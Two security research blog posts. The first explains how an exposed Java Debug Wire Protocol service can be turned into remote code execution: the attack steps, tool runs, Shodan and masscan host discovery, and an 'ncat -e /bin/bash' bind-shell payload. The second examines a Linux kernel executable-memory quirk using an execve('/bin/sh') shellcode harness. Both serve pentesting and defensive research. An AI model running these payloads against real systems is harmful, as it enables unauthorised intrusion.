INSIGHTS | April 23, 2014

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”

By Christophe Alladoum – @_hugsy_
 
TL;DR: turn any open JDWP service into reliable remote code execution (exploit inside)
 
<plagiarism> Kids, I’m gonna tell you an incredible story. </plagiarism>
This is the story of how I came across an interesting protocol during a recent code review engagement for IOActive and turned it into a reliable way to execute remote code. In this post, I will explain the Java Debug Wire Protocol (JDWP) and why it is interesting from a penetration tester’s point of view. I will cover some JDWP internals and how to use them to perform code execution, resulting in a reliable and universal exploitation script. So let’s get started.
 
Disclaimer: This post provides techniques and exploitation code that should not be used against vulnerable environments without prior authorization. The author cannot be held responsible for any private use of the tool or techniques described therein.
 
Note: As I was looking into JDWP, I stumbled upon two brief posts on the same topic (see [5] (in French) and [6]). They are worth reading, but do not expect that a deeper understanding of the protocol itself will allow you to reliably exploit it. This post does not reveal any 0-day exploits, but instead thoroughly covers JDWP from a pentester/attacker perspective. 

Java Debug Wire Protocol

Java Platform Debug Architecture (JPDA)
JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture (JPDA). The following is a diagram of the overall architecture:
 

 

 
The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp (or -agentlib). For example, starting a Tomcat server with remote debugging enabled would look like this:
 

 

As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
  • It is a packet-based network binary protocol.
  • It is mostly synchronous. The debugger sends a command over JDWP and expects to receive a reply. However, some commands, like Events, do not expect a synchronous response. They will send a reply when specific conditions are met. For example, a BreakPoint is an Event.
  • It does not use authentication.
  • It does not use encryption.
 
All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.


Handshake
JDWP dictates[9] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger (client) sends the 14-character ASCII string “JDWP-Handshake”. 
The Debuggee (server) responds to this message by sending the exact same string. 
 
The following scapy[3] trace shows the initial two-way handshake:

 

root:~/tools/scapy-hg # ip addr show dev eth0 | grep “inet “
    inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0
root:~/tools/scapy-hg # ./run_scapy
Welcome to Scapy (2.2.0-dev)
>>> sniff(filter=”tcp port 8000 and host 192.168.2.9″, count=8)
<Sniffed: TCP:9 UDP:1 ICMP:0 Other:0>
>>> tcp.hexraw()
0000 15:49:30.397814 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 S
0001 15:49:30.402445 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 SA
0002 15:49:30.402508 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A
0003 15:49:30.402601 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake

0004 15:49:30.407553 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0005 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0006 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake
0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A

An experienced security auditor may have already realised that such a simple handshake offers a way to easily uncover live JDWP services on the Internet. Just send one simple probe and check for the specific response. 

 
More interestingly, a behavior was observed on the IBM Java Development Kit when scanning with ShodanHQ with the server “talking” first with the very same banner mentioned. As a consequence, there is a totally passive way to discover an active JDWP service (this is covered later on in this article with the help of the (in)famous Shodan).


Communication
JDWP defines messages[10] involved in communications between the Debugger and the Debuggee. 
 
The messages follow a simple structure, defined as follows:
 

 

The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table. 

CommandSet
   Command
0x40 
   Action to be taken by the JVM (e.g. setting a BreakPoint)
0x40–0x7F     
   Provide event information to the debugger (e.g. the JVM has       hit a BreakPoint and is waiting for further actions)
0x80
   Third-party extensions
 
Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
  • VirtualMachine/IDSizes defines the size of the data structures handled by the JVM. This is one of the reasons why the nmap script jdwp-exec.nse[11] does not work, since the script uses hardcoded sizes.
  • ClassType/InvokeMethod allows you to invoke a static function.
  • ObjectReference/InvokeMethod allows you to invoke a function from an instantiated object in the JVM.
  • StackFrame/(Get|Set)Values provides pushing/popping capabilities from threads stack.
  • Event/Composite forces the JVM to react to specific behaviors declared by this command. This command is a major key for debugging purposes as it allows, among many other things, setting breakpoints, single-stepping through the threads during runtime, and being notified when accessing/modifying values in the exact same manner as GDB or WinDBG.
 
Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
  • VirtualMachine/CreateString allows  you to transform a string into a java.lang.String living in the JVM runtime.
  • VirtualMachine/RedefineClasses allows you to install new class definitions.
 
“All your JDWP are belong to us”
As we have seen, JDWP provides built-in commands to load arbitrary classes into the JVM memory and invoke already existing and/or newly loaded bytecode. The following section will cover the steps for creating exploitation code in Python, which behaves as a partial implementation of a JDI front end in order to be as reliable as possible. The main reason for this standalone exploit script is that, as a pentester, I like “head-shot” exploits. That is, when I know for sure an environment/application/protocol is vulnerable, I want to have my tool ready to exploit it right away (i.e. no PoC, which is basically the only thing that existed so far). So now that we have covered the theory, let’s get into the practical implementation.
 
When faced with an open JDWP service, arbitrary command execution is exactly five steps away (or with this exploit, only one command line away). Here is how it would go down:
 
1. Fetch Java Runtime reference
The JVM manipulates objects through their references. For this reason, our exploit must first obtain the reference to the java.lang.Runtime class. From this class, we need the reference to the getRuntime() method. This is performed by fetching all classes (AllClasses packet) and all methods in the class we are looking for (ReferenceType/Methods packet).
 
2. Setup breakpoint and wait for notification (asynchronous calls)
This is the key to our exploit. To invoke arbitrary code, we need to be in a running thread context. To do so, a hack is to setup a breakpoint on a method which is known to be called at runtime. As seen earlier, a breakpoint in JDI is an asynchronous event whose type is set to BREAKPOINT(0x02). When hit, the JVM sends an EventData packet to our debugger, containing our breakpoint ID, and more importantly, the reference to the thread which hit it.

 

It is therefore a good idea to set it on a frequently called method, such as java.net.ServerSocket.accept(), which is very likely to be called every time the server receives a new network connection. However, one must bear in mind that it could be any method existing at runtime.
 
3. Allocating a Java String object in Runtime to carry out the payload
We will execute code in the JVM runtime, so all of our manipulated data (such as string) must exist in the JVM runtime (i.e. possess an runtime reference). This is done quite easily by sending a CreateString command.
 

 

 
4. Get Runtime object from breakpoint context
At this point we have almost all of the elements we need for a successful, reliable exploitation. What we are missing is a Runtime object reference. Obtaining it is easy, and we can simply execute in the JVM runtime the java.lang.Runtime.getRuntime() static method[8] by sending a ClassType/InvokeMethod packet and providing the Runtime class and thread references.
 
5. Lookup and invoke exec() method in Runtime instance
The final step is simply looking for the exec() method in the Runtime static object obtained for the previous step and invoking it (by sending a ObjectReference/InvokeMethod packet) with the String object we created in step three. 
 
Et voilà !! Swift and easy.
 
As a demonstration, let’s start a Tomcat running with JPDA “debug mode” enabled:
root@pwnbox:~/apache-tomcat-6.0.39# ./bin/catalina.sh jpda start
 
We execute our script without a command to execute, to simply get general system information:
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9 
[+] Targeting ‘192.168.2.9:8000’
[+] Reading settings for ‘Java HotSpot(TM) 64-Bit Server VM – 1.6.0_65’
[+] Found Runtime class: id=466
[+] Found Runtime.getRuntime(): id=7facdb6a8038
[+] Created break event id=2
[+] Waiting for an event on ‘java.net.ServerSocket.accept’
## Here we wait for breakpoint to be triggered by a new connection ##
[+] Received matching event from thread 0x8b0
[+] Found Operating System ‘Mac OS X’
[+] Found User name ‘pentestosx’
[+] Found ClassPath ‘/Users/pentestosx/Desktop/apache-tomcat-6.0.39/bin/bootstrap.jar’
[+] Found User home directory ‘/Users/pentestosx’
[!] Command successfully executed


Same command line, but against a Windows system and breaking on a totally different method:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –break-on ‘java.lang.String.indexOf’
[+] Targeting ‘192.168.2.8:8000’
[+] Reading settings for ‘Java HotSpot(TM) Client VM – 1.7.0_51’
[+] Found Runtime class: id=593
[+] Found Runtime.getRuntime(): id=17977a9c
[+] Created break event id=2
[+] Waiting for an event on ‘java.lang.String.indexOf’
[+] Received matching event from thread 0x8f5
[+] Found Operating System ‘Windows 7’
[+] Found User name ‘hugsy’
[+] Found ClassPath ‘C:UsershugsyDesktopapache-tomcat-6.0.39binbootstrap.jar’
[+] Found User home directory ‘C:Usershugsy’
[!] Command successfully executed


We execute our exploit to spawn a bind shell with the payload  “ncat -e /bin/bash -l -p 1337”, against a Linux system:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 –cmd ‘ncat -l -p 1337 -e /bin/bash’
[+] Targeting ‘192.168.2.8:8000’
[+] Reading settings for ‘OpenJDK Client VM – 1.6.0_27’
[+] Found Runtime class: id=79d
[+] Found Runtime.getRuntime(): id=8a1f5e0
[+] Created break event id=2
[+] Waiting for an event on ‘java.net.ServerSocket.accept’
[+] Received matching event from thread 0x82a
[+] Selected payload ‘ncat -l -p 1337 -e /bin/bash’
[+] Command string object created id:82b
[+] Runtime.getRuntime() returned context id:0x82c
[+] found Runtime.exec(): id=8a1f5fc
[+] Runtime.exec() successful, retId=82d
[!] Command successfully executed
 
Success, we now have a listening socket!
root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
tcp        0      0 0.0.0.0:1337         0.0.0.0:*               LISTEN      19242/ncat      
tcp6       0      0 :::1337              :::*                    LISTEN      19242/ncat     


Same win on MacOSX:
pentests-Mac:~ pentestosx$ lsof | grep LISTEN
ncat      4380 pentestosx    4u    IPv4 0xffffff800c8faa40       0t0        TCP *:menandmice-dns (LISTEN)
 
A link to full exploitation script is provided here[1]. 
 
The final exploit uses those techniques, adds a few checks, and sends suspend/resume signals to cause as little disruption as possible (it’s always best not to break the application you’re working on, right?). It acts in two modes: 
  • “Default” mode is totally non intrusive and simply executes Java code to get local system information (perfect for a PoC to a client).
  • Passing the “cmd” option executes a system command on the remote host and is therefore more intrusive. The command is done with the privileges the JVM is running with.
 
This exploit script was successfully tested against:
  • Oracle Java JDK 1.6 and 1.7
  • OpenJDK 1.6
  • IBM JDK 1.6
 
As Java is platform-independent by design, commands can be executed on any operating system that Java supports.
 
Well this is actually good news for us pentesters: open JDWP service means reliable RCE
 
So far, so good.


What about real-life exploitation?

As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would (and should) mostly block the port it is running on.
 
But this does not mean that JDWP cannot be found in the wild:
  • At the time of writing this article, a quick search on ShodanHQ[4] immediately reveals about 40 servers sending the JDWP handshake:

 

This is actually an interesting finding because, as we’ve seen before, it is supposed to be the client-side (debugger) that initiates dialogue.
  • GitHub[7] also reveals a significant number of potentially vulnerable open-source applications:

 

  • masscan-ing the Internet looking for specific ports (tcp/8000, tcp/8080, tcp/8787, tcp/5005) revealed many hosts (which cannot be reported here) responding to the initial handshake.
  • “Enterprise” applications were found in the wild running a JDWP service *by default* (finding the actual port number is left as an exercise to the curious reader).
 
These are just a few ways to discover open JDWP services on the Internet. This is a great reminder that applications should regularly undergo thorough security reviews, production environments should have any debugging functionality turned off, and firewalls should be configured to restrict access to services required for normal operation only. Allowing anybody to connect to a JDWP service is exactly the same as allowing a connection to a gdbserver service (in what may be a more stable way).
 
I hope you enjoyed reading this article as much as I enjoyed playing with JDWP. 
 
To y’all mighty pirates, happy JDWP pwning !!


Thanks

I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests.


References:
  1. https://github.com/IOActive/jdwp-shellifier
  2. http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
  3. http://www.secdev.org/projects/scapy(no longer active)
  4. http://www.shodanhq.com/search?q=JDWP-HANDSHAKE 
  5. http://www.hsc-news.com/archives/2013/000109.html (no longer active) 
  6. http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt 
  7. https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
  8. http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
  9. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
  10. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
  11. http://nmap.org/nsedoc/scripts/jdwp-exec.html
INSIGHTS | November 27, 2013

A Short Tale About executable_stack in elf_read_implies_exec() in the Linux Kernel

This is a short and basic analysis I did when I was uncertain about code execution in the data memory segment. Later on, I describe what’s happening in the kernel side as well as what seems to be a small logic bug.
I’m not a kernel hacker/developer/ninja; I’m just a Linux user trying to figure out the reason of this behavior by looking in key places such as the ELF loader and other related functions. So, if you see any mistakes or you realize that I approached this in a wrong way, please let me know, I’d really appreciate that.
This article also could be useful for anyone starting in shellcoding since they might think their code is wrong when, in reality, there are other things around to take care of in order to test the functionality of their shellcodes or any other kind of code.
USER-LAND: Why is it possible to execute code in the data segment if it doesn’t have the PF_EXEC enabled?
A couple of weeks ago I was reading an article (in Spanish) about shellcodes creation in Linux x64. For demonstration purposes I’ll use this 64-bit execve(“/bin/sh”) shellcode: 

#include <unistd.h>

char shellcode[] =
“x48x31xd2x48x31xf6x48xbf”
“x2fx62x69x6ex2fx73x68x11”
“x48xc1xe7x08x48xc1xefx08”
“x57x48x89xe7x48xb8x3bx11”
“x11x11x11x11x11x11x48xc1”
“xe0x38x48xc1xe8x38x0fx05”;

int main(int argc, char ** argv) {
void (*fp)();
fp = (void(*)())shellcode;
(void)(*fp)();

return 0;
}

The author suggests the following for the proper execution of the shellcodes:
We compile and with the execstack utility we specify that the stack region used in the binary will be executable…”.

Immediately, I thought it was wrong because of the code to be executed would be placed in the ‘shellcode’ symbol in the .data section within the ELF file, which, in turn, would be in the data memory segment, not in the stack segment at runtime. For some reason, when trying to execute it without enabling the executable stack bit, it failed, and the opposite when it was enabled:

 

According to the execstack’s man-page:

“… ELF binaries and shared libraries now can be marked as requiring executable stack or not requiring it… This marking is done through the p_flags field in the PT_GNU_STACK program header entry… The marking is done automatically by recent GCC versions”.
It only modifies one bit adding the PF_EXEC flag to the PT_GNU_STACK program header. It also can be done by modifying the binary with an ELF editor such as HTEditor or at linking time by passing the argument ‘-z execstack’ to gcc. 
The change can be seen simply observing the flags RWE (Read, Write, Execution) using the readelf utility. In our case, only the ‘E’ flag was added to the stack memory segment:

 
The first loadable segment in both binaries, with the ‘E’ flag enabled, is where the code itself resides (the .text section) and the second one is where all our data resides. It’s also possible to map which bytes from each section correspond to which memory segments (remember, at runtime, the sections are not taken into account, only the program headers) using ‘readelf -l shellcode’.

So far, everything makes sense to me, but, wait a minute, the shellcode, or any other variable declared outside main(), is not supposed to be in the stack right? Instead, it should be placed in the section where the initialized data resides (as far as I know it’s normally in .data or .rodata). Let’s see where exactly it is by showing the symbol table and the corresponding section of each symbol (if it applies):

It’s pretty clear that our shellcode will be located at the memory address 0x00600840 in runtime and that the bytes reside in the .data section. The same result for the other binary, ‘shellcode_execstack’.

By default, the data memory segment doesn’t have the PF_EXEC flag enabled in its program header, that’s why it’s not possible to jump and execute code in that segment at runtime (Segmentation Fault), but: when the stack is executable, why is it also possible to execute code in the data segment if it doesn’t have that flag enabled? 

 
Is it a normal behavior or it’s a bug in the dynamic linker or kernel that doesn’t take into account that flag when loading ELFs? So, to take the dynamic linker out of the game, my fellow Ilja van Sprundel gave me the idea to compile with -static to create a standalone executable. A static binary doesn’t pass through the dynamic linker, instead, it’s loaded directly by the kernel (as far as I know). The same result was obtained with this one, so this result pointed directly to the kernel.

I tested this in a 2.6 kernel (x86_64) and in a 3.2 kernel (i686), and I got the same behavior in both.
KERNEL-LAND: Is that a bug in elf_read_implies_exec()?

Now, for the interesting part, what is really happening in the kernel side? I went straight to load_elf_binary()in linux-2.6.32.61/fs/binfmt_elf.c and found that the program header table is parsed to find the stack segment so as to set the executable_stack variable correctly:

     int executable_stack = EXSTACK_DEFAULT;

elf_ppnt = elf_phdata;
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
if (elf_ppnt->p_type == PT_GNU_STACK) {
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;

else
executable_stack = EXSTACK_DISABLE_X;
break;
}

Keep in mind that only those three constants about executable stack are defined in the kernel (linux-2.6.32.61/include/linux/binfmts.h):

/* Stack area protections */
#define EXSTACK_DEFAULT    0  /* Whatever the arch defaults to */
#define EXSTACK_DISABLE_X  1  /* Disable executable stacks */
#define EXSTACK_ENABLE_X   2  /* Enable executable stacks */

Later on, the process’ personality is updated as follows:

     /* Do this immediately, since STACK_TOP as used in setup_arg_pages may depend on the personality.  */
SET_PERSONALITY(loc->elf_ex);
     if (elf_read_implies_exec(loc->elf_ex, executable_stack))
current->personality |= READ_IMPLIES_EXEC;

if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;

elf_read_implies_exec() is a macro in linux-2.6.32.61/arch/x86/include/asm/elf.h:

/*
* An executable for which elf_read_implies_exec() returns TRUE 

 * will have the READ_IMPLIES_EXEC personality flag set automatically.
*/
#define elf_read_implies_exec(ex, executable_stack)
(executable_stack != EXSTACK_DISABLE_X)

In our case, having an ELF binary with the PF_EXEC flag enabled in the PT_GNU_STACK program header, that macro will return TRUE since EXSTACK_ENABLE_X != EXSTACK_DISABLE_X, thus, our process’ personality will have READ_IMPLIES_EXEC flag. This constant, READ_IMPLIES_EXEC, is checked in some memory related functions such as in mmap.c, mprotect.c and nommu.c (all in linux-2.6.32.61/mm/). For instance, when creating the VMAs (Virtual Memory Areas) by the do_mmap_pgoff() function in mmap.c, it verifies the personality so it can add the PROT_EXEC (execution allowed) to the memory segments [1]:

     /*
* Does the application expect PROT_READ to imply PROT_EXEC?
*
* (the exception is when the underlying filesystem is noexec
*  mounted, in which case we dont add PROT_EXEC.)
*/
if ((prot & PROT_READ) && (current->personality & READ_IMPLIES_EXEC))
if (!(file && (file->f_path.mnt->mnt_flags & MNT_NOEXEC)))
prot |= PROT_EXEC;

And basically, that’s the reason of why code in the data segment can be executed when the stack is executable.

On the other hand, I had an idea: to delete the PT_GNU_STACK program header by changing its corresponding program header type to any other random value. Doing that, executable_stack would remain EXSTACK_DEFAULT when compared in elf_read_implies_exec(), which would return TRUE, right? Let’s see:


The program header type was modified from 0x6474e551 (PT_GNU_STACK) to 0xfee1dead, and note that the second LOAD (data segment, where our code to be executed is) doesn’t have the ‘E’xecutable flag enabled: 

 

The code was executed even when the execution flag is not enabled in the program header that holds it. I think it’s a logic bug in elf_read_implies_exec() because one can simply delete the PT_GNU_STACK header as to set executable_stack = EXSTACK_DEFAULT, making elf_read_implies_exec() to return TRUE. Instead comparing against EXSTACK_DISABLE_X, it should return TRUE only if executable_stack is EXSTACK_ENABLE_X:

#define elf_read_implies_exec(ex, executable_stack)
(executable_stack == EXSTACK_ENABLE_X)

Anyway, perhaps that’s the normal behavior of the Linux kernel for some compatibility issues or something else, but isn’t it weird that making the stack executable or deleting the PT_GNU_STACK header all the memory segments are loaded with execution permissions even when the PF_EXEC flag is not set?

What do you think?
Side notes:
       Kernel developers pass loc->elf_ex and never use it in:
#define elf_read_implies_exec(ex, executable_stack) (executable_stack != EXSTACK_DISABLE_X)

       Two constants are defined but never used in the whole kernel code:
#define INTERPRETER_NONE 0
#define INTERPRETER_ELF  2
Finally, I’d like to thank my collegues Ilja van Sprundel and Diego Bauche Madero for giving me some ideas.
Thanks for reading.
References:
[1] “Understanding the Linux Virtual Memory Manager”. Mel Gorman.
Chapter 4 – Process Address Space.